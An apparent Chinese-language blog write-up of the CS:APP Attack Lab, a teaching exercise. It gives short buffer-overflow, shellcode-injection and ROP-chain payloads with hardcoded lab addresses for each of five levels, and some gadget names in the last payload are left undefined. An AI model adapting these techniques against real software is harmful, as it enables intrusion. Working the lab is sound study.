csapp attack lab

csapp attack

level1

简单的跳转过去就行了,payload:

payload1 = b'a'*0x28  + p64(0x04017C0)

level2

传个参,可以发现程序开了个rwx的段给我们用,那就是ret2shellcode了,自己写个gadget然后ret过去,payload:

payload2 = asm('mov rdi, 0x59b997fa')
payload2 += asm('ret')
payload2 = payload2.ljust(0x28, b'\x00')
payload2 += p64(0x5561dc78) + p64(0x4017ec)

level3

传引用值,我选择把字符串放前面,然后传地址就行了,payload:

payload3 = b'59b997fa' + asm('mov rdi, 0x5561dc78') + asm('ret')
payload3 = payload3.ljust(0x28, b'\x00')
payload3 += p64(0x5561dc80) + p64(0x04018fa)

level4

没有那个固定rwx段了,只能rop,不过还是较为简单,找一个pop rdi; ret就行了,exp:

rdi_ret = 0x000000000040141b
rsi = 0x401383
cookie = 0x59b997fa
payload4 = b'a'*0x28 + p64(rdi_ret) + p64(cookie) + p64(0x4017ec)

level5

思路肯定不是leak栈地址,那必然是通过rbp或者rsp来修改栈段内容了,找到这样一个函数:

00000000004019d6 <add_xy>:
  4019d6:	48 8d 04 37          	lea    (%rdi,%rsi,1),%rax
  4019da:	c3 

想办法把rdi设置为rsp,再控制偏移就行了。payload:

payload5 = b'59b997fa' + b'\x00'*0x20 + p64(rsi) + p64(18446744073709551552) + p64(rsp2rax)+p64(rax2rdi) + p64(0x4019d6) + p64(rax2rdi) + p64(0x4018fa)

你可能感兴趣的:(csapp attack lab)